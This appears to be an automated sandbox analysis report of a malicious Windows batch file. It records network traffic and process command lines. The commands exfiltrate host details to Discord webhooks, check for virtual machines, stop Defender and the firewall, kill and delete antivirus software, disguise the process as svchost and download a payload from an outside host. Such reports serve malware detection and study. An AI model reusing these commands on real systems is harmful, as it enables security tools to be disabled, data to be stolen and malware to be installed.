                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 00 00 0a 2d 3f 02 18 25 0a 7d 5e 00 00 04 02 08 7d 62 00 00 04 02 7c 5f 00 00 04 12 02 02 28 48 00 00 2b dd b3 00 00 00 02 7b 62 00 00 04 0c 02 7c 62 00 00 04 fe 15 15 00 00 1b 02 15 25 0a 7d 5e 00 00 04 12 02 28 a6 00 00 0a 26 02 7b 61 00 00 04 72 cf 0a 00 70 28 28 00 00 06 6f a4 00 00 0a 0c 12 02 28 a5 00 00 0a 2d 3c 02 19 25 0a 7d 5e 00 00 04 02 08 7d 62 00 00 04 02 7c 5f 00 00 04 12 02 02 28 48 00 00 2b de 50 02 7b 62 00 00 04 0c 02 7c 62 00 00 04 fe 15 15 00 00 1b 02 15 25 0a 7d 5e 00 00 04 12 02 28 a6 00 00 0a 26 de 17 0d 02 1f fe 7d 5e 00 00 04 02 7c 5f 00 00 04 09 28 20 00 00 0a de 13 02 1f fe 7d 5e 00 00 04 02 7c 5f 00 00 04 28 21 00 00 0a 2a 00 00 41 1c 00 00 00 00 00 00 07 00 00 00 58 02 00 00 5f 02 00 00 17 00 00 00 1b 00 00 01 1b 30 03 00 cb
                                                                                                                              Data Ascii: -?%}^}b|_(H+{b|b%}^(&{arp((o(-<%}^}b|_(H+P{b|b%}^(&}^|_( }^|_(!*AX_0


Session ID: 5
Source IP: 192.168.2.8
Source Port: 64913
Destination IP: 162.159.128.233
Destination Port: 443
PID: 3372
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-06 11:37:39 UTC | 336 | OUT | POST /api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Content-Type: application/json
  Host: ptb.discord.com
  Content-Length: 50
  Expect: 100-continue
  Connection: Keep-Alive
2024-10-06 11:37:39 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-10-06 11:37:39 UTC | 50 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 46 61 69 6c 65 64 20 74 6f 20 64 6f 77 6e 6c 6f 61 64 20 65 78 65 2e 65 78 65 22 0d 0a 7d
  Data Ascii: { "content": "Failed to download exe.exe"}
2024-10-06 11:37:40 UTC | 1369 | IN | HTTP/1.1 404 Not Found
  Date: Sun, 06 Oct 2024 11:37:40 GMT
  Content-Type: application/json
  Content-Length: 45
  Connection: close
  set-cookie: __dcfduid=648e1e3e83d711efa1222e6bea697208; Expires=Fri, 05-Oct-2029 11:37:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
  x-ratelimit-limit: 5
  x-ratelimit-remaining: 4
  x-ratelimit-reset: 1728214661
  x-ratelimit-reset-after: 1
  via: 1.1 google
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCWBk2%2FUnFbrwYkx1MryQh%2BIRQdTLum%2FZejWsAr6aiu3euwg1TXNnt33p8%2B2Fxlv68Hz4n56518HpsgA%2BTgJQ3yxaoMWIORbY9axWm2THY8PUanmVYnGmbvXuUzWavLtUw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  X-Content-Type-Options: nosniff
  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
  Set-Cookie: __sdcfduid=648e1e3e83d711efa1222e6bea69720871fa1048c683cd0b23181c93d19fe4facf90e24b0bfe98c28416ab86fcd5cb02; Expires=Fri, 05-Oct-2029 11:37:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
  Set-Cookie: __cfruid=3e1b35420a45e4990d8b0aa7548cd31247594e2b-1728214660; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
  Set-Cookie: _cfuvi
2024-10-06 11:37:40 UTC | 238 | IN | Data Raw: 64 3d 4c 4b 5f 51 4c 41 5a 79 46 73 50 56 64 69 47 30 33 42 62 4f 6e 42 6d 2e 6f 48 41 4f 75 64 57 46 38 36 67 55 51 56 36 4d 53 62 4d 2d 31 37 32 38 32 31 34 36 36 30 30 31 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 63 35 38 33 39 65 30 34 33 30 38 2d 45 57 52 0d 0a 0d 0a 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
  Data Ascii: d=LK_QLAZyFsPVdiG03BbOnBm.oHAOudWF86gUQV6MSbM-1728214660013-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55c5839e04308-EWR{"message": "Unknown Webhook", "code": 10015}


Target ID: 1
Start time: 07:36:04
Start date: 06/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" "
Imagebase: 0x7ff7591a0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 07:36:04
Start date: 06/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 07:36:05
Start date: 06/10/2024
Path: C:\Windows\System32\curl.exe
Wow64 process (32bit): false
Commandline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
Imagebase: 0x7ff7d29a0000
File size: 530'944 bytes
MD5 hash: EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 07:36:06
Start date: 06/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic computersystem get manufacturer,model
Imagebase: 0x7ff707dc0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 07:36:06
Start date: 06/10/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr /i "vmware virtualbox"
Imagebase: 0x7ff72d1c0000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 07:36:06
Start date: 06/10/2024
Path: C:\Windows\System32\curl.exe
Wow64 process (32bit): false
Commandline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
Imagebase: 0x7ff7d29a0000
File size: 530'944 bytes
MD5 hash: EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 7
Start time: 07:36:07
Start date: 06/10/2024
Path: C:\Windows\System32\net.exe
Wow64 process (32bit): false
Commandline: net session
Imagebase: 0x7ff7bbea0000
File size: 59'904 bytes
MD5 hash: 0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 07:36:07
Start date: 06/10/2024
Path: C:\Windows\System32\net1.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\net1 session
Imagebase: 0x7ff793490000
File size: 183'808 bytes
MD5 hash: 55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 07:36:07
Start date: 06/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'"
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 07:36:09
Start date: 06/10/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"
Imagebase: 0x7ff61a0e0000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 07:36:10
Start date: 06/10/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33AA.tmp" "c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP"
Imagebase: 0x7ff637540000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 12
Start time: 07:36:14
Start date: 06/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true"
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:14
                                                                                                                              Start time:07:36:24
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:15
                                                                                                                              Start time:07:36:35
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Stop-Process -Name MSASCui -Force -ErrorAction SilentlyContinue"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:16
                                                                                                                              Start time:07:36:36
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:17
                                                                                                                              Start time:07:36:39
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:20
                                                                                                                              Start time:07:36:55
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:21
                                                                                                                              Start time:07:37:16
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:22
                                                                                                                              Start time:07:37:25
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:23
                                                                                                                              Start time:07:37:26
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:explorer.exe
                                                                                                                              Imagebase:0x7ff62d7d0000
                                                                                                                              File size:5'141'208 bytes
                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              Target ID:24
                                                                                                                              Start time:07:37:26
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to change directory to 'C:\\Users\\Public\\Documents\\Secret Document'\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"
                                                                                                                              Imagebase:0x7ff7d29a0000
                                                                                                                              File size:530'944 bytes
                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:25
                                                                                                                              Start time:07:37:27
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                              Imagebase:0x7ff67e6d0000
                                                                                                                              File size:55'320 bytes
                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              Target ID:28
                                                                                                                              Start time:07:37:29
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"
                                                                                                                              Imagebase:0x7ff7d29a0000
                                                                                                                              File size:530'944 bytes
                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:32
                                                                                                                              Start time:07:37:30
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:35
                                                                                                                              Start time:07:37:34
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Invoke-RestMethod -Uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd' -Method Post -Body (@{content='Failed to download exe.exe'} | ConvertTo-Json) -ContentType 'application/json'"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true


                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:5.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:3
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 4226 7ffb4b296dfb 4227 7ffb4b296e07 SetProcessWorkingSetSizeEx 4226->4227 4229 7ffb4b296ee1 4227->4229

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 7ffb4b36091e-7ffb4b360995 6 7ffb4b360997-7ffb4b3609a6 0->6 7 7ffb4b3609a9-7ffb4b3609ba 0->7 6->7 10 7ffb4b3609bc-7ffb4b3609c7 7->10 11 7ffb4b3609d7-7ffb4b360a59 7->11 14 7ffb4b360a5f-7ffb4b360a69 11->14 15 7ffb4b360d24-7ffb4b360db3 11->15 16 7ffb4b360a82-7ffb4b360a87 14->16 17 7ffb4b360a6b-7ffb4b360a80 14->17 45 7ffb4b360dba-7ffb4b360dcb 15->45 46 7ffb4b360db5 15->46 20 7ffb4b360cc1-7ffb4b360ccb 16->20 21 7ffb4b360a8d-7ffb4b360a90 16->21 17->16 23 7ffb4b360cdc-7ffb4b360d21 20->23 24 7ffb4b360ccd-7ffb4b360cdb 20->24 25 7ffb4b360a92-7ffb4b360a9b 21->25 26 7ffb4b360aa7-7ffb4b360aab 21->26 23->15 25->26 26->20 31 7ffb4b360ab1-7ffb4b360ae8 26->31 41 7ffb4b360b0c-7ffb4b360b10 31->41 42 7ffb4b360aea-7ffb4b360afb 31->42 41->20 47 7ffb4b360b16-7ffb4b360b1e 41->47 42->41 50 7ffb4b360dd2-7ffb4b360e69 45->50 51 7ffb4b360dcd 45->51 46->45 49 7ffb4b360db7 46->49 53 7ffb4b360b20-7ffb4b360b2a 47->53 54 7ffb4b360b2e 47->54 49->45 64 7ffb4b361140-7ffb4b3611b6 50->64 65 7ffb4b360e6f-7ffb4b360e79 50->65 51->50 56 7ffb4b360dcf 51->56 58 7ffb4b360b2c 53->58 59 7ffb4b360b4a-7ffb4b360b7a 53->59 60 7ffb4b360b33-7ffb4b360b48 54->60 56->50 58->60 59->54 70 7ffb4b360b7c-7ffb4b360b86 59->70 60->59 99 7ffb4b3611b7-7ffb4b3611cf 64->99 67 7ffb4b360e92-7ffb4b360e97 65->67 68 7ffb4b360e7b-7ffb4b360e90 65->68 73 7ffb4b3610dd-7ffb4b3610e7 67->73 74 7ffb4b360e9d-7ffb4b360ea0 67->74 68->67 75 7ffb4b360b9f-7ffb4b360c00 70->75 76 7ffb4b360b88-7ffb4b360b9d 70->76 82 7ffb4b3610f8-7ffb4b36113d 73->82 83 7ffb4b3610e9-7ffb4b3610f7 73->83 80 7ffb4b360ea2-7ffb4b360eab 74->80 81 7ffb4b360eb7-7ffb4b360ebb 74->81 102 7ffb4b360c02-7ffb4b360c13 75->102 103 7ffb4b360c14-7ffb4b360c52 75->103 76->75 80->81 81->73 88 7ffb4b360ec1-7ffb4b360ef8 81->88 82->64 105 7ffb4b360f1c 88->105 106 7ffb4b360efa-7ffb4b360f0d 88->106 112 7ffb4b3611d1 99->112 113 7ffb4b3611d6-7ffb4b3611e7 
99->113 102->103 132 7ffb4b360c6b-7ffb4b360c8a 103->132 133 7ffb4b360c54-7ffb4b360c69 103->133 110 7ffb4b360f1e-7ffb4b360f20 105->110 115 7ffb4b360f24-7ffb4b360f29 106->115 124 7ffb4b360f0f-7ffb4b360f1a 106->124 110->73 110->115 112->113 116 7ffb4b3611d3 112->116 117 7ffb4b3611ee-7ffb4b36120a 113->117 118 7ffb4b3611e9 113->118 115->73 120 7ffb4b360f2f-7ffb4b360f3a 115->120 116->113 117->99 123 7ffb4b36120c-7ffb4b361284 117->123 118->117 122 7ffb4b3611eb 118->122 125 7ffb4b360f3c-7ffb4b360f46 120->125 126 7ffb4b360f4a 120->126 122->117 144 7ffb4b36144b-7ffb4b3614dd 123->144 145 7ffb4b36128a-7ffb4b361294 123->145 124->110 129 7ffb4b360f48 125->129 130 7ffb4b360f66-7ffb4b360f76 125->130 131 7ffb4b360f4f-7ffb4b360f64 126->131 129->131 139 7ffb4b360f78-7ffb4b360f81 130->139 140 7ffb4b360f83-7ffb4b360f8c 130->140 131->130 154 7ffb4b360c94-7ffb4b360c9a 132->154 133->132 139->140 140->73 182 7ffb4b3614e0-7ffb4b3614f1 144->182 183 7ffb4b3614df 144->183 149 7ffb4b3612ad-7ffb4b3612b2 145->149 150 7ffb4b361296-7ffb4b3612a3 145->150 152 7ffb4b3613eb-7ffb4b3613f5 149->152 153 7ffb4b3612b8-7ffb4b3612bb 149->153 150->149 161 7ffb4b3612a5-7ffb4b3612ab 150->161 159 7ffb4b3613f7-7ffb4b361403 152->159 160 7ffb4b361404-7ffb4b361448 152->160 157 7ffb4b3612d2-7ffb4b3612d6 153->157 158 7ffb4b3612bd-7ffb4b3612c6 153->158 166 7ffb4b360ca1-7ffb4b360cc0 154->166 157->152 167 7ffb4b3612dc-7ffb4b361313 157->167 158->157 160->144 161->149 180 7ffb4b361337 167->180 181 7ffb4b361315-7ffb4b361335 167->181 184 7ffb4b361339-7ffb4b36133b 180->184 181->184 185 7ffb4b3614f4-7ffb4b3615b1 182->185 186 7ffb4b3614f3 182->186 183->182 184->152 188 7ffb4b361341-7ffb4b36137f 184->188 186->185 200 7ffb4b361381-7ffb4b361396 188->200 201 7ffb4b361398-7ffb4b3613b7 188->201 200->201 206 7ffb4b3613c1-7ffb4b3613c6 201->206 207 7ffb4b3613cd-7ffb4b3613ea 206->207
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                • Opcode ID: 055c4ef21e5520e877b4b95f1dd2d41767261f315c209e48b58ceeac8c923735
                                                                                                                                • Instruction ID: 6336c14eccb9bf4c792bf38653c79ecc15ab22c634a66493da8ddbebb0358d03
                                                                                                                                • Opcode Fuzzy Hash: 055c4ef21e5520e877b4b95f1dd2d41767261f315c209e48b58ceeac8c923735
                                                                                                                                • Instruction Fuzzy Hash: 928216A291DBC60FE766AB3D88562B57FE1EF56210B0841FFD18DCB0A3DD185C4A8352

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
